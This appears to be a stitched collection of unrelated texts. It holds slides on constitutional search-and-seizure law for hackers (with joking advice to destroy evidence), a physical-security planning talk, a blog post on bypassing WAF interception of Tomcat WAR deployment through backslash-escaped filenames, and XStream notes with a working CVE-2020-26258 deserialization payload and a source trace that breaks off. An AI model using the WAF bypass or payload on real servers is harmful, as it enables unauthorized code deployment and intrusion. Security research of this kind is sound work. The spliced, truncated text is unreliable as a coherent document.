Q: Which article applied most of
the bill of rights to the states?
A: 14th Amendment.
The Constitution Quiz
Q: Which article or amendment
contains the section on privacy?
A: None. It‟s a judicial fiction.
The Constitution Quiz
Q: When was the last amendment
to the constitution ratified?
A: May 7th, 1992
The Constitution Quiz
Q: When was it proposed?
A: September 25th, 1789 - James
Madison
The Constitution Quiz
Q: President Barack Obama was
a professor of ____ law?
A: Constitutional Law
Back to the point…
Introduction to
„The Fourth‟
The Fourth Amendment
“The right of the people to be secure in
their persons, houses, papers, and effects,
against unreasonable searches and
seizures, shall not be violated, and no
warrants shall issue, but upon probable
cause, supported by oath or affirmation,
and particularly describing the place to be
searched, and the persons or the things to
be seized.”
Amendment IV
Two separate clauses
„Reasonableness‟ Clause
“The right of the people to be secure in their
persons, houses, papers, and effects, against
unreasonable searches and seizures, shall not
be violated…”
„Warrant‟ Clause
“… no warrants shall issue, but upon probable
cause, supported by oath or affirmation, and
particularly describing the place to be
searched, and the persons or the things to be
seized.”
Search and Seizure
Separate
Examples:
Person Seized and Searched
Car pulled over, Driver Frisked
Person Seized but not Searched
Traffic Citation
Person Searched but not Seized
Thermal Scans, X-Rays, etc.
Brain Scans..?
Search / Seizure
Defined
Search
Expectation of Privacy
Seizure
Individual - when a person believes
he is not free to ignore the
government‟s presence
Property - Meaningful
interference with an individual‟s
possessory interest
Suspicion Standards
Mere Suspicion
A hunch or feeling
Reasonable Suspicion
Premised upon articulable facts and
circumstances
Probable Cause
Search
Reasonable believe that evidence /
contraband will be found
Arrest
Facts and circumstances indicate that a
person had committed or was committing a
crime
Exceptions to the Rule
Border
Plain view
Open Fields
Exigent Circumstances
Search incident to arrest
Civil search
Motor Vehicle (reduced)
Public Schools (reduced)
Consent
The Fifth Amendment
… nor shall be compelled in any criminal
case to be a witness against himself, nor be
deprived of life, liberty, or property,
without due process of law; …”
Amendment V
When does it apply?
The fifth amendment applies when a
statement or act is:
compelled;
Cannot be voluntary
testimonial; and
Says or doesn‟t say something
Authenticates existence, ownership, etc.
Incriminating
Subjects to criminal responsibility
Applies equally in civil / criminal settings
Contents
“Although the contents of a
document may not be privileged,
the act of producing the
document may be.” United States
v. Doe, (1984)
Exceptions to the Rule
Physical evidence is not testimony
Fingerprints
Blood Samples
Hair
Voice Samples
Etc.
“Foregone Conclusions”
If they know it exists and can prove it by
other means
Requires a grant of immunity
The Lock vs. The Safe
A lock is physical evidence
Not a product of the mind
Subject to subpoena
The combination to a safe is not
physical evidence
Is a product of the mind
Not subject to a subpoena, unless...
Use / Derivative Use
Immunity
If the government promises not to
use the „production‟ of the evidence
against the defendant; and
Can independently verify the
existence of the evidence; then
the 5th Amendment doesn‟t apply
18 U.S.C. § 6002
Whenever a witness refuses, on the basis of his
privilege against self-incrimination, to testify or
provide other information in a proceeding before
or ancillary to:
(1) a court or grand jury of the United States…
[If ordered], the witness may not refuse to comply
with the order on the basis of his privilege against
self-incrimination; but no testimony or other
information compelled under the order (or any
information directly or indirectly derived from
such testimony or other information) may be used
against the witness in any criminal case…
They took my
laptop!
Resident Aliens
(really quickly)
Resident Aliens
Generally - aliens treated the same
under the U.S. Constitution as
Citizens
Wong Wing v. U.S. (U.S. 1896) -
Established that an alien subject
to criminal proceedings is entitled
to the same constitutional
protections available to citizens
Rasul v. Bush (U.S. 2004) - Degree of
control over Gitmo is sufficient to
trigger habeas corpus rights
Resident Aliens
Wong Wing v. U.S. (U.S. 1896) - The
contention that persons within the
territorial jurisdiction of this
republic might be beyond the
protection of the law was heard
with pain on the argument at the bar -
- in face of the great constitutional
amendment which declares that no
state shall deny to any person
within its jurisdiction the equal
protection of the laws.
Resident Aliens
Hamdi v. Rumsfeld (U.S. 2004) - "a
state of war is not a blank
check for the President when it
comes to the rights of the
Nation's citizens."
Lets try to make
this fun
The Rules
All scenarios Warrantless, unless
stated otherwise
It is the current date
Hypotheticals
Name: SkyDog
Age: Really Old
Occupation:
Hacker
Consortium
Godfather
Prisoner #: 42
Not real SkyDog actions, I hope. Only using his name.
Communications
SkyDog has just attended
Outerz0ne „09 and decides to
tell his friends, all 2 of them,
how amazing it was.
He calls, writes a letter to, and
emails his friends Wrench (in
Nashville) and Bush (in Iraq)…
SkyDog‟s Friends
Wrench
Bush
Communications
Mail
U.S. v. Seljan (9th Cir., 2008) (Ok to read foreign
letters without suspicion)
U.S. v. Ramsey (U.S., 1977) (Reasonable Suspicion
req‟d)
FISA Court Approval of Warrantless Wiretapping
One party believed to be outside the U.S.
Does not apply to pre-Protect America Act (PAA)
wiretapping
Email
On personal machine - Warrant or exception
On remote server - available by subpoena
Account Information - Court order
Private Search
After Outerz0ne „09, SkyDog
returns to Nashville only to find
he‟s been evicted and his laptop was
stolen by some Asshats.
One of the Asshats turned on the
laptop, found all of SkyDog‟s
Hacker Consortium files, freaked
out, and called the police. The
police have Scott Moulton run
EnCase on Sky‟s machine…
Private Search
U.S. v. Runyan (5th, 2002)
Examining part of a system does
not open all parts
U.S. v. Crist (M. Dist. Pa, 2008)
Using EnCase to hash files is a
„search‟
Private Search
SkyDog gets back his laptop from
the police and boots up Windows
Millennium. The machine is hacked
into by a Turkish citizen on the hunt
for terrorist hackers.
After finding SkyDog‟s Hacker
Consortium documents, the man
quickly reports SkyDog to the FBI…
Private Search
Unknownuser Cases
U.S. v. Steiger (11th Cir. 2003)
U.S. v. Jarrett (E.D. Va, 2002)
Private Search Factors
Government encouraged/initiated
the search; or aware/acquiesced
to the search?
And did the private actor intend to
help law enforcement?
Border Crossing
SkyDog is stressed out and takes a
vacation to Mexico and engages in
some serious drinking. While
returning, he has a feeling is going
to be searched and not being quite in
his right mind, SkyDog swallows his
cellphone. He also attempts to
„hide‟ his laptop but is unable to fit it
...
SkyDog was selected for a search…
What this might look like
Border Crossing
U.S. v Arnold (9th Cir, 2007) -
Laptops no different from closed
containers which are subject to
suspicionless searches
Routine
Allowed by fact that you‟re
crossing the border
Non-Routine Searches
Requires reasonable suspicion
Border Crossing
While searching his laptop the
officers find a drive named „My
Illegal Files‟ and proceed to
open a document containing
what appears to be a listing of
credit card numbers. They
confiscate the laptop but upon
turning it back on they find the
drive has been encrypted…
Border Crossing
In Re Boucher (M.D. Vt, 2008) -
Encryption keys are products of the
mind and are not subject to
disclosure under the 5th amendment
In Re Boucher (M.D. Vt, 2009) - Wait,
never mind it was a foregone
conclusion.
The vault code v. key to a lock
debate
Border Crossing
Because of the heavy drinking
SkyDog‟s eyes are red, his skin is
pale (more so than usual), and
he has the shakes…
Strip Search
Non-Routine, so it requires more.
Usually part of an inventory search,
so not „criminal‟ in nature
Recent Cases (non-border)
Subjecting a 13 year old student to a
strip search unreasonable when looking
for ibuprofen 800mg.
Subjecting a female motorist to a strip
search after arrest for a misdemeanor
marijuana possession, unreasonable.
Especially while it was watched by male
officers over the closed circuit t.v.
system.
Border Crossing
During the strip-search, the
examining officer noticed a lump
in SkyDogs throat…
Bodily Intrusion
Non-Routine
A lot of crossover with the other
amendments
May require a warrant depending on
the level of urgency required, even
at the border
Let‟s just say SkyDog would be sore
in the morning…
Arrested
Because of all the odd behavior
and suspicious actions SkyDog
is arrested on suspicion of
Smuggling --something. During
the booking SkyDog‟s Phone
Rings…
Answering Cellphone
U.S. v. De La Paz (S.D. NY, 1999) -
Agents had probable cause to
believe that a cell phone, a
common tool in the drug trade,
would provide further evidence.
Due to the temporal nature of a
phone call, it was not
unreasonable for police to
answer the call.
The beat down
After some investigation SkyDog is
released. He returns home to his
neighbor being beaten by a masked
man who runs through his house.
Police arrive and SkyDog consents
to a search of his house.
the police notice a „Stolen Credit
Cards‟ folder on his desktop. They
begin search through his computer…
The beat down
U.S. v. Turner (1st Cir, 1999) - Even
though consent to a search was
given, the consent did not extend
beyond evidence of the assault. The
initial evidence, however, would be
available under plain view exception.
Military Invasion
It turns out that the „Stolen Credit
Cards‟ folder was actually just his
al & tigger porno, all 25 tbs, so he is
released again.
Unfortunately, those
emails/letters SkyDog sent to Bush
looked like terrorist documents.
The President orders a raid, by the
military, of both SkyDog‟s and
Bush‟s houses…
SkyDog Porn Sample
Military Invasion
Bush Memo (2003) - "... our Office
recently concluded that the Fourth
Amendment had no application to
domestic military operations”
In Re: Terrorist Bombings (2nd Cir,
2009) - “The Fourth Amendment‟s
requirement of reasonableness —
but not the Warrant Clause — applies
to extraterritorial searches and
seizures of U.S. citizens”
So what can I do about it?
Don‟t keep sensitive data, memorize
everything and eat the evidence
Only travel with „clean‟ equipment
Format, download data over secured channels
upon arrival
Encrypt Liberally
Never physically store the key
Ideally have a physical / non-physical key
Shutdown equipment long before crossing
Use bios passwords
Never travel with something you can‟t
afford to lose.
Miscellaneous Recent Cases
Herring v. U.S. (U.S., 2009) - Exclusionary
rule does not apply “when police mistakes
are the result of negligence such as that
described here.”
State v. Stephenson (Minn. App, 2009) -
Defendant excluded from home by court
order had no reasonable expectation of
privacy.
Wisconsin v. Sveum (Wi. App, 2009) -
Warrantless GPS tracking OK.
People v. Weaver (Ny., 2009) - Warrantless
GPS tracking not OK.
Disclaimer
It is vitally important for you to
understand that while I am an
attorney, I am not your attorney.
In no way, shape, or form is this
presentation intended to provide you
with legal advice.
Before relying or acting upon any
information learned from this
presentation you should consult a
licensed attorney in your State.
The End | pdf |
Physical
Security
(You’re Doing It Wrong)
A.P. Delchi
# whois delchi
‣ Infosec Rasputin
‣ Defcon, HOPE, Pumpcon,
Skytalks
‣ Minister of Propaganda &
Revenge, Attack Research
# whois delchi
$DEITY
Grant me the serenity to accept
people who will not secure their
networks,
the courage to face them when
they blame me for their
problems,
and the wisdom to go out
drinking afterwards
“You’re Doing It Wrong”
A phrase
meaning that
the method you
are using is not
creating the
desired result
Your Mission
Design and implement a physical
security system for a new facility,
to include multi-factor
authentication and video
surveillance.
“Proper Previous
Planning Prevents
Piss Poor
Performance”
Dick Marcinko,
“The Rogue Warrior”
Physical Security
Physical security describes both measures that prevent or deter attackers from accessing a facility, resource, or information stored on physical media and guidance on how to design structures to resist various hostile acts.
en.wikipedia.org/wiki/Physical_security
Measures to reasonably ensure that source or special nuclear material will only be used for authorized purposes and to prevent theft or sabotage.
www.nrc.gov/reading-rm/doc-collections/cfr/part110/part110-0002.html
The measures used to provide physical protection of resources against deliberate and accidental threats.
www.tsl.state.tx.us/ld/pubs/compsecurity/glossary.html
Methodology
• Assessment
• Assignment
• Arrangement
• Approval
• Action
Methodology
ASSESSMENT
A thorough examination of the
facility to be protected.
Methodology
ASSESSMENT
•Scope of property to be protected
•Established points of entry and egress
•Potential points of entry and egress
•Existing security measures
•Evaluation of physical property
•Risk assessment
Methodology
ASSIGNMENT
Establish the required level of
security for specific areas and
assets within the facility.
Methodology
ASSIGNMENT
•High level
✓Data Centers
✓Executive Offices
✓Finance & Accounting
• Medium Level
✓ Entry & Egress
✓ Reception
✓ Elevators
• Low Level
✓ Common Areas
✓ Cubicle Farms
Methodology
ASSIGNMENT
•Considerations
✓ Insurance requirements
✓ Compliance requirements
✓ Fire code requirements
✓ Business requirements
Methodology
ARRANGEMENT
Establish the most effective
locations for security devices
based on their requirements.
Methodology
ARRANGEMENT
•Cameras
✓Field of view
✓Redundancy
✓Tracking
• Doorways
✓ Type of locks
✓ Multi factor authentication
✓ Time based restrictions
• Central Control
✓ Cabling limitations
✓ Power, archiving, and disaster planning
Methodology
APPROVAL
Submit all plans, costs, schedules
and related data to management.
Methodology
APPROVAL
•Hardware
✓Quotes from multiple vendors
✓Lifetime requirements
✓Service plans
• Costs
✓ Plan A, B, and C
✓ Flexibility
✓ Options
• Schedule
✓ Time frame for completion
✓ Interference with business operations
Methodology
ACTION
Implementing the physical
installation and configuration of
the approved system.
Methodology
ACTION
•Construction
✓Oversee construction
✓Oversee inspections by state / local govt
✓Manage corrections
• Training
✓ Security officers
✓ Users
✓ Establishing policy & procedure
• Testing
✓ Ensuring the system works as planned
✓ Compliance testing
What Could
Possibly Go
Wrong?
"No plan of
operations extends
with certainty
beyond the first
encounter with the
enemy's main
strength."
Count Helmuth von Moltke
Methodology
TRAINING
Experience
Planning
Management
PROS :
✓ Provide Budget
✓ Set Requirements
✓ Sign your paycheck
✓ Run the show
Cons :
✓ They know this
Strife
"I want a state of the art high tech system. FBI, CIA kind of security"
"I can do that. Based on your needs, and the floor plan it will cost $54,875."
"Can't you just buy something from Costco?"
<REDACTED>
CEO of Information Security Firm
≠
Strife
"I went to Best Buy and saw a HDMI cable for $50. I went home and surfed the internet for a while and found the same cable for $2 from a web site in China. If I can do that for a cable I expect you to do the same thing for my security system."
<REDACTED>
CEO of Fortune 500 Security Firm
Be knowledgeable on the equipment, methodology and best practices for your industry.
Understand the impact that your project will have on business & user activity.
Rely on facts, not speculation, theory, rumors, or maybes.
Present facts, support with documentation, explain risk and impact, prove mitigation.
Present in a factual & respectful manner, showing your work and explaining your reasoning behind the design.
If you don't know, you don't know. State that you will research and return with the answers.
Be prepared to lose gracefully.
SUCCESS
"This is one hell of a security system. Whoever did this knew what the hell they were doing."
<REDACTED>
Visitor, Friend of CEO of information security firm
“Shut up, get it done,
failure is not an
option.”
Charles Rawls
VP of ass kicking
dorsai Embassy, Earth
Vendors
PROS :
✓ Provide Cool Toys
✓ Will Let You Play with
The Cool Toys
✓ Have historical info on
product quality
Cons :
✓ Will expect you to buy
From Them
“The Ferengi Rules Of
Acquisition”
$6.99
ISBN : 0671529366
RULE # 1
There are many, many, many vendors
out there
RULE # 2
You do not always need the latest,
greatest state of the art item
RULE # 3
Always deal with vendors between
11 AM & 2 PM
Reality
Requirements → RFQ → Quote
Never rely on a single vendor
Do not get caught up in vendor wars
Ensure that the vendor is
knowledgeable on the products they
are selling
Do your own product research
Beware of unnecessary up-selling
Get details on all aspects ... warranty,
service , training ....
Do not be afraid to revise your RFQ
Do not be afraid to READ your RFQ
Keep all paperwork, quotes, and RFQ
revisions
Prioritize your needs to make a
balance between budget and
equipment
Look for hidden costs, cost
creep, feature creep, and
after contract expenses
If you work with multiple
vendors for components of a
system it is YOUR
responsibility to ensure that
the products will work
together
Know up front if sub-
contracting will happen, and if
so do due diligence on the sub
contractors
A high price support contract
does not always mean high
quality support
"There are no
honorable bargains
involving exchange
of qualitative
merchandise like
souls. Just
quantitative
merchandise like time
and money."
William S. Burroughs
“Words Of Advice For Young People”
People Who THINK
They Know More Than You
PROS :
✓ They Usually Don’t
✓ Make You Look Good
✓ Annoy Management
Cons :
✓ Rarely Shut Up
"Of course the alarm says it's 105 degrees. The sensor is on the ceiling, and heat rises. It's 105 up there, but down here where the servers are it's nowhere near 105."
<REDACTED>
CEO, MIT MBA,
Said 20 minutes before servers automatically shut down due to thermal alarms
Know the difference between
water cooler talk and factual
discourse.
Refute with facts, experience, and
a even tone
Do NOT use personal attacks,
vulgar insults, or questionable
phrases or terms
If they start playing the brownie
points game, stop.
If they start playing politics,
stop.
If they cite something they heard
on AM talk radio, RUN!
Cut sheets from the vendor are
a better point of reference
than something told to a
coworker by their barber who
heard it from his cousin who
works on the loading dock
where the publish that
technology magazine .
Do not play buzzword bingo
Know what the terms,
acronyms, and technological
phrases you use mean.
Let them kiss ass, while you kick
ass.
"What about biometrics?"
"Biometric three phase multi-homed active authentication is the best!"
"*Ahem*"
"I am not paid to listen to this drivel. You are a terminal fool."
NO!
"What about biometrics?"
"Biometric three phase multi-homed active authentication is the best!"
"As per your requirements the RFQ contains two factor authentication with an option for biometrics as a third, pending budgetary constraints. The cut sheets are in your copy of the RFQ."
YES!
CONSTRUCTION
WORKERS
PROS :
✓ Reliable Timing
✓ Know Trade Secrets
✓ Tell Good Jokes
Cons :
✓ Will Do EXACTLY what
You Tell Them To Do
Know the work schedule for
the construction team
Meet the foreman. Get his
contact information.
Read the blueprints.
Read the blueprints again, with
the foreman.
Supervise the construction.
Look for things that are not
quite right.
Expect to find surprises.
Expect to pay to fix them.
Construction workers and
their foreman are the first line
of defense when it comes to
building inspections.
They know what needs to be
done, and why.
They deal with the same state/
county/city building inspectors
on multiple projects.
Listen to them. Do what they
say. This is their area of
expertise, even if the only
adjective they know is “fucking”
“The fucking wiring is not
hooked up to the fucking switch
correctly, so it’s not going to
fucking work. It’s fucked.”
-NJ construction worker
Construction workers on
your project may not
speak English.
If this is a problem , deal
with it before work
begins.
Consult with HR
before bringing up the
subject.
If you can not
communicate with each
other there is no way to
indicate problems, make
changes, or share dirty
jokes
Things Will Go Wrong
Not all problems
can be solved
with a clever
work-around.
A quick fix today
can be a problem
tomorrow.
Pizza and beer is
cheaper than
overtime.
USERS
PROS :
✓ The Reason You Are Here
✓ Love To Take Classes
✓ Attracted To New Tech
Cons :
✓ Will Expect Your System
To Act The Way They Want
It To
"If you have responsibility
for security but have no
authority to set rules or
punish violators, your own
role in the organization is
to take the blame when
something big goes wrong."
Professor Gene Spafford
"Practical Unix and Internet Security"
"Be comforted that in the face of all
aridity and disillusionment,
and
despite the changing fortunes of time,
There is always a big future in computer
maintenance."
"Deteriorata" - National Lampoon, 1972
勿忘初心 - Ch1ng's Blog — Thinking and Acting
A Deep Dive into Bypassing the Interception of Tomcat WAR Deployment
Author: admin
Date: 2022-05-25
Category: Random notes, Development
A fun trick from a recent engagement.
0x01 Preface
On an engagement I got into the Tomcat manager, but deploying a WAR package kept being intercepted — which kicked off a round of source-code auditing.
0x02 Analysis
When a \ character was added to the filename parameter, the application deployed successfully and slipped past the WAF; by normal logic a package named like that should not deploy at all.
Locating Tomcat's upload servlet — HTMLManagerServlet — shows it calling the upload method. Following in,
the filename is obtained via the getSubmittedFileName function. Following in again,
getSubmittedFileName processes the filename with the HttpParser.unquote function. Following in once more,
debugging shows that whenever the filename contains a \ character the parser silently skips it and takes the next character instead,
so the final filename turns from fu2.\war into fu2.war.
Since fu2.\war does not look like a dangerous extension to the WAF on the wire, it is not intercepted. Taking the idea further, \f\u\2\.w\a\r or demo.w\\\\\\ar and the like all bypass as well — the rest is up to the reader's imagination.
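The behavior is easy to see in isolation (a simplified restatement of the unquote logic described above, assuming the quoted/escaped-filename handling of the HttpParser class):
public class UnquoteDemo {
    static String unquote(String input) {
        if (input == null || input.length() < 2) return input;
        int start = input.charAt(0) == '"' ? 1 : 0;
        int end = input.charAt(input.length() - 1) == '"' ? input.length() - 1 : input.length();
        StringBuilder sb = new StringBuilder();
        for (int i = start; i < end; i++) {
            char c = input.charAt(i);
            if (c == '\\') { i++; sb.append(input.charAt(i)); } // drop the escape, keep the next char
            else sb.append(c);
        }
        return sb.toString();
    }
    public static void main(String[] args) {
        System.out.println(unquote("fu2.\\war")); // prints fu2.war
    }
}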
XStream Security Research Notes
I. Introduction
XStream has lately produced a steady stream of security advisories. I had meant to look at the component a year ago but never got around to it; with CVE-2020-26217, CVE-2020-26258 and CVE-2020-26259 now public, it is time to go back through the XStream code.
XStream's architecture consists of four main modules:
Converters
Drivers
Context
Facade
Converters are the core of XStream, responsible for converting XML into Java objects and Java objects into XML; XStream ships with many converters, among them a DefaultConverter that uses reflection to load the objects named in the XML.
Drivers read and operate on XML directly from a stream; their two interfaces, HierarchicalStreamWriter and HierarchicalStreamReader, handle serializing Java objects to XML and deserializing XML back to Java objects respectively.
A Context object is required during both serialization and deserialization; depending on the operation a MarshallingContext or an UnmarshallingContext is created, and the process looks up the appropriate converters through it to perform each conversion.
Finally, the documentation describes XStream's facade pattern:
The main XStream class is typically used as the entry point. This assembles the necessary
components of XStream (as described above; Context, Converter, Writer/Reader and ClassMapper)
and provides a simple to use API for common operations.
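In facade terms that means round-tripping through a single object (a minimal usage sketch of my own, not taken from the XStream docs):
import com.thoughtworks.xstream.XStream;

public class FacadeDemo {
    public static void main(String[] args) {
        XStream xstream = new XStream();
        String xml = xstream.toXML(new java.util.Date()); // marshal: object -> XML
        Object back = xstream.fromXML(xml);               // unmarshal: XML -> object
        System.out.println(xml + " -> " + back);
    }
}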
II. Forward Analysis
The three advisories break down as:
CVE-2020-26217 — remote code execution
CVE-2020-26258 — server-side request forgery
CVE-2020-26259 — arbitrary file deletion
Constrained by space and energy, we will deep-dive only one of the vulnerabilities; they are all alike, and by summarizing the similarities the others become quick to understand as well.
We will analyze CVE-2020-26258 (the server-side request forgery) in depth. On to the analysis.
Proof of Concept:
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler class="com.sun.xml.internal.ws.encoding.DataSourceStreamingDataHandler">
<dataSource class="javax.activation.URLDataSource">
<url>http://127.0.0.1:1337/internal</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
When constructing the XStream object and starting deserialization we deliberately leave the security context uninitialized, so nothing gets blocked by the whitelist. Readers are encouraged to debug along themselves; rather than narrate every call, only the key calls are shown.
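For reference, the harness used is nothing more than this (my own scaffolding, assuming a vulnerable XStream ≤ 1.4.14 on the classpath and the PoC saved as poc.xml):
import com.thoughtworks.xstream.XStream;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Poc {
    public static void main(String[] args) throws Exception {
        String payload = new String(Files.readAllBytes(Paths.get("poc.xml")));
        XStream xstream = new XStream(); // security framework deliberately left uninitialized
        xstream.fromXML(payload);        // the entry point traced below
    }
}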
XStream.class
public Object fromXML(String xml) {
return this.fromXML((Reader)(new StringReader(xml))); <------- point
}
public Object fromXML(Reader reader) {
return this.unmarshal(this.hierarchicalStreamDriver.createReader(reader), (Object)null); <------- point
}
public Object unmarshal(HierarchicalStreamReader reader, Object root) {
return this.unmarshal(reader, root, (DataHolder)null); <------- point
}
public Object unmarshal(HierarchicalStreamReader reader, Object root, DataHolder dataHolder) {
try {
if (!this.securityInitialized && !this.securityWarningGiven) {
this.securityWarningGiven = true;
System.err.println("Security framework of XStream not explicitly initialized, using predefined black list on your own risk.");
}
return this.marshallingStrategy.unmarshal(root, reader, dataHolder, this.converterLookup, this.mapper); <------- point
} catch (ConversionException var7) {
Package pkg = this.getClass().getPackage();
String version = pkg != null ? pkg.getImplementationVersion() : null;
var7.add("version", version != null ? version : "not available");
throw var7;
}
}
As for why the XStream developers wrote it with this many layers of wrapping, my guess is later maintainability — or, put differently, extensibility.
AbstractTreeMarshallingStrategy.class
public Object unmarshal(Object root, HierarchicalStreamReader reader, DataHolder dataHolder, ConverterLookup converterLookup, Mapper mapper) {
TreeUnmarshaller context = this.createUnmarshallingContext(root, reader, converterLookup, mapper);
return context.start(dataHolder); <------- point
}
Here an UnmarshallingContext is created; during deserialization it is used to look up the right converters for each data-format conversion.
TreeUnmarshaller.class
public Object start(DataHolder dataHolder) {
this.dataHolder = dataHolder;
Class type = HierarchicalStreams.readClassType(this.reader, this.mapper);
Object result = this.convertAnother((Object)null, type); <------- point
Iterator validations = this.validationList.iterator();
while(validations.hasNext()) {
Runnable runnable = (Runnable)validations.next();
runnable.run();
}
return result;
}
The corresponding converters then perform the corresponding data-format conversions.
TreeUnmarshaller.class
public Object convertAnother(Object parent, Class type) {
return this.convertAnother(parent, type, (Converter)null); <------- point
}
public Object convertAnother(Object parent, Class type, Converter converter) {
type = this.mapper.defaultImplementationOf(type);
if (converter == null) {
converter = this.converterLookup.lookupConverterForType(type);
} else if (!converter.canConvert(type)) {
ConversionException e = new ConversionException("Explicit selected converter cannot handle type");
e.add("item-type", type.getName());
e.add("converter-type", converter.getClass().getName());
throw e;
}
return this.convert(parent, type, converter); <------- point
}
AbstractReferenceUnmarshaller.class
protected Object convert(Object parent, Class type, Converter converter) {
Object result;
if (this.parentStack.size() > 0) {
result = this.parentStack.peek();
if (result != null && !this.values.containsKey(result)) {
this.values.put(result, parent);
}
}
String attributeName = this.getMapper().aliasForSystemAttribute("reference");
String reference = attributeName == null ? null : this.reader.getAttribute(attributeName);
boolean isReferenceable = this.getMapper().isReferenceable(type);
Object currentReferenceKey;
if (reference != null) {
currentReferenceKey = isReferenceable ? this.values.get(this.getReferenceKey(reference)) : null;
if (currentReferenceKey == null) {
ConversionException ex = new ConversionException("Invalid reference");
ex.add("reference", reference);
ex.add("referenced-type", type.getName());
ex.add("referenceable", Boolean.toString(isReferenceable));
throw ex;
}
result = currentReferenceKey == NULL ? null : currentReferenceKey;
} else if (!isReferenceable) {
result = super.convert(parent, type, converter);
} else {
currentReferenceKey = this.getCurrentReferenceKey();
this.parentStack.push(currentReferenceKey);
Object localResult = null;
try {
localResult = super.convert(parent, type, converter); <------- point
} finally {
result = localResult;
if (currentReferenceKey != null) {
this.values.put(currentReferenceKey, localResult == null ? NULL : localResult);
}
this.parentStack.popSilently();
}
}
return result;
}
TreeUnmarshaller.class
protected Object convert(Object parent, Class type, Converter converter) {
this.types.push(type);
Object var4;
try {
var4 = converter.unmarshal(this.reader, this); <------- point
} catch (ConversionException var10) {
this.addInformationTo(var10, type, converter, parent);
throw var10;
} catch (RuntimeException var11) {
ConversionException conversionException = new ConversionException(var11);
this.addInformationTo(conversionException, type, converter, parent);
throw conversionException;
} finally {
this.types.popSilently();
}
return var4;
}
MapConverter.class
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
Map map = (Map)this.createCollection(context.getRequiredType());
this.populateMap(reader, context, map); <------- point
return map;
}
Note in particular that the line
Map map = (Map)this.createCollection(context.getRequiredType());
first creates the java.util.Map object reflectively, based on the <map> element in the XML.
AbstractCollectionConverter.class
protected Object createCollection(Class type) {
ErrorWritingException ex = null;
Class defaultType = this.mapper().defaultImplementationOf(type);
try {
return defaultType.newInstance(); <------- point
} catch (InstantiationException var5) {
ex = new ConversionException("Cannot instantiate default collection", var5);
} catch (IllegalAccessException var6) {
ex = new ObjectAccessException("Cannot instantiate default collection", var6);
}
((ErrorWritingException)ex).add("collection-type", type.getName());
((ErrorWritingException)ex).add("default-type", defaultType.getName());
throw ex;
}
Deserialization of the map's key/value pairs then begins in populateMap.
MapConverter.class
protected void populateMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map) {
this.populateMap(reader, context, map, map); <------- point
}
protected void populateMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map, Map target) {
while(reader.hasMoreChildren()) {
reader.moveDown();
this.putCurrentEntryIntoMap(reader, context, map, target); <------- point
reader.moveUp();
}
}
protected void putCurrentEntryIntoMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map, Map target) {
Object key = this.readCompleteItem(reader, context, map);
Object value = this.readCompleteItem(reader, context, map);
target.put(key, value); <------- sink
}
Before following into the sink, let us look at how XStream deserializes the contents of the key/value pairs.
AbstractCollectionConverter.class
protected Object readCompleteItem(HierarchicalStreamReader reader, UnmarshallingContext context, Object current) {
reader.moveDown();
Object result = this.readItem(reader, context, current); <------- point
reader.moveUp();
return result;
}
protected Object readItem(HierarchicalStreamReader reader, UnmarshallingContext context, Object current) {
return this.readBareItem(reader, context, current); <------- point
}
protected Object readBareItem(HierarchicalStreamReader reader, UnmarshallingContext context, Object current) {
Class type = HierarchicalStreams.readClassType(reader, this.mapper()); <------- point
return context.convertAnother(current, type);
}
HierarchicalStreams.class
public static Class readClassType(HierarchicalStreamReader reader, Mapper mapper) {
String classAttribute = readClassAttribute(reader, mapper);
Class type;
if (classAttribute == null) {
type = mapper.realClass(reader.getNodeName()); <------- point
} else {
type = mapper.realClass(classAttribute);
}
return type;
}
CachingMapper.class
public Class realClass(String elementName) {
Object cached = this.realClassCache.get(elementName);
if (cached != null) {
if (cached instanceof Class) {
return (Class)cached;
} else {
throw (XStreamException)cached;
}
} else {
try {
Class result = super.realClass(elementName); <------- point
this.realClassCache.put(elementName, result);
return result;
} catch (ForbiddenClassException var4) {
this.realClassCache.put(elementName, var4);
throw var4;
} catch (CannotResolveClassException var5) {
this.realClassCache.put(elementName, var5);
throw var5;
}
}
}
As the code shows, on a cache miss the work is handed to the parent class (MapperWrapper), which keeps searching converters to finish the conversion.
MapperWrapper.class
public Class realClass(String elementName) {
return this.realClassMapper.realClass(elementName); <------- point
}
SecurityMapper.class
public Class realClass(String elementName) {
Class type = super.realClass(elementName); <------- point
for(int i = 0; i < this.permissions.size(); ++i) {
TypePermission permission = (TypePermission)this.permissions.get(i);
if (permission.allows(type)) {
return type;
}
}
throw new ForbiddenClassException(type);
}
......
DefaultMapper.class
public Class realClass(String elementName) {
Class resultingClass = Primitives.primitiveType(elementName);
if (resultingClass != null) {
return resultingClass;
} else {
try {
boolean initialize = true;
ClassLoader classLoader;
if (elementName.startsWith(XSTREAM_PACKAGE_ROOT)) {
classLoader = DefaultMapper.class.getClassLoader();
} else {
classLoader = this.classLoaderReference.getReference();
initialize = elementName.charAt(0) == '[';
}
return Class.forName(elementName, initialize, classLoader); <------- point
} catch (ClassNotFoundException var5) {
throw new CannotResolveClassException(elementName);
}
}
}
The call stack for this stretch was captured as a screenshot in the original note (Class.forName in DefaultMapper.realClass, reached up through the mapper chain and the converters).
At this point jdk.nashorn.internal.objects.NativeString has been instantiated via Java reflection. Once initialized it is added to the cache, so the next deserialization takes it straight from the cache instead of calling the reflection API again. Next comes the call to HashMap.put(), which enters the sink; the trigger class is NativeString.
MapConverter.class
protected void putCurrentEntryIntoMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map, Map target) {
Object key = this.readCompleteItem(reader, context, map);
Object value = this.readCompleteItem(reader, context, map);
target.put(key, value); <------- sink
}
Map.class
public V put(K key, V value) {
return putVal(hash(key), key, value, false, true); <------- point
}
HashMap.class
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16); <------- point
}
NativeString.class
public int hashCode() {
return this.getStringValue().hashCode(); <------- point
}
private String getStringValue() {
return this.value instanceof String ? (String)this.value : this.value.toString(); <------- point
}
Base64Data.class
